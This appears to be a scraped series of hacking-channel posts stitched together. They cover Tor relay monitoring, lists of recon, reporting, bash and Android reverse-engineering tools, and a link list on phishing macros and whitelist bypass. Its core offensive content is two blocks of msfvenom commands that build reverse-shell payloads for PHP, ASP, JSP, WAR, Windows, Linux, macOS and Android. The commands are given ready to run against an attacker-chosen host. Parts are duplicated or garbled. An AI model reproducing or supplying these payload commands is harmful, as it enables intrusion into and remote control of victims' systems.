4️⃣ Inspection and maintenance :

1) After the node is set up, you can use the "netstat -an" command to check whether your node service listening port has established a TCP connection. In addition,

2) it is recommended to search for your own node by using the IP address or nickname as a keyword in Tor Metrics to check its operating status, where "Fingerprint" is the unique identity of the node, and "Consensus Weight" is the pathfinding weight of the node (and bandwidth (It depends on the duration of the operation. The larger the number, the easier it is to select).

3) If you want to better monitor the node's running status and system resource usage in real time, it is recommended to install nyx :

> apt-get install nyx

> pip install nyx

> After the installation is complete, add the following parameters to the torrc file:

> ControlPort 9051

> CookieAuthentication 1

3) After the configuration is complete, you can start nyx directly in the terminal (note the user rights), and press the q key twice to exit.


🦑WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Exploits & #Bugs New :


[Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)

CVE-2017-0199 Toolkit


[Window Signed Binary](https://github.com/vysec/Windows-SignedBinary)

Wepwnise

[Bash Bunny](https://hakshop.com/products/bash-bunny)

Generate Macro - Tool

[How To: Empiresa Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)

Excel macros with PowerShell

[PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)

MS Signed mimikatz in just 3 steps

[Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)

Luckystrike: An Evil Office Document Generator

[The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)

Macro-less Code Exec in MSWord

[Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)

Macroless DOC malware that avoids detection with Yara rule

[Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)

Powershell without Powershell to bypass app whitelist/

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Web #Payloads Commands Metasploit



1️⃣msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

2️⃣ Creates a Simple TCP Shell for PHP

3️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

4️⃣Creates a Simple TCP Shell for ASP

5️⃣msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

6️⃣ Creates a Simple TCP Shell for Javascript

7️⃣ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`

8️⃣ Creates a Simple TCP Shell for WAR

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Open Source #Threat Intelligence

- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.

- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 IP address and DNS #Lookup Tools 2020 :

- bgp

- Bgpview

- DataSploit (IP Address Modules)

- Domain Dossier

- Domaintoipconverter

- Googleapps Dig

- Hurricane Electric BGP Toolkit

- ICANN Whois

- Massdns

- Mxtoolbox

- Ultratools ipv6Info

- Viewdns

- Umbrella (OpenDNS) Popularity List

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Public Pen Testing Reports recommended :

> The following are several resources that are useful when writing penetration testing reports, including many different examples:


1️⃣Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |

2️⃣ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |

3️⃣ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |

4️⃣ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |

5️⃣ Dradis Framework | https://dradisframework.com/ce/ |

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Creating Binaries with metasploit :

1) - msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

2) - Creates a simple TCP Payload for Windows
- msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

3) - Creates a simple HTTP Payload for Windows
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf

4) - Creates a simple TCP Shell for Linux

5) - msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho

6) - Creates a simple TCP Shell for Mac

7) - msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk

8) - Creates a simple TCP Payload for Android


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Shell Script Development :

- ansi - ANSI escape codes in pure bash

- change text color, position the cursor, much more

- argbash - Bash argument parsing code generator

- assert.sh - Bash unit testing framework

- BashScriptTestingLibrary - A unit testing framework for Bash scripts

- bash3boilerplate - Templates to write better Bash scripts

- bashful - A collection of libraries to simplify writing Bash scripts

- bashmanager - mini bash framework for creating command line tools

- bats - Bash Automated Testing System

- bash_unit - bash unit testing enterprise edition framework for professionals

- mo - Mustache templates in pure bash

- semver_bash - Semantic Versioning in Bash

- shfmt - Format bash programs

- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit

- bashing - Smashing Bash into Pieces

- Bash framework for creating command line tools

- shellcheck - ShellCheck, a static analysis tool for shell scripts

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2020 Verified Cve SpotOutlook Crash 100/100

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Android Security Editing 2020 resources :

- Android Developer Studio

- APKtool

- dex2jar

- Bytecode Viewer

- IDA Pro

- Android Reverse Engineering Arsenals

@UndercodeSecurity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Android Security Editing 2020 resources :

- Android Developer Studio

- APKtool

- dex2jar

- Bytecode Viewer

- IDA Pro

- Android Reverse Engineering Arsenals

@UndercodeSecurity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁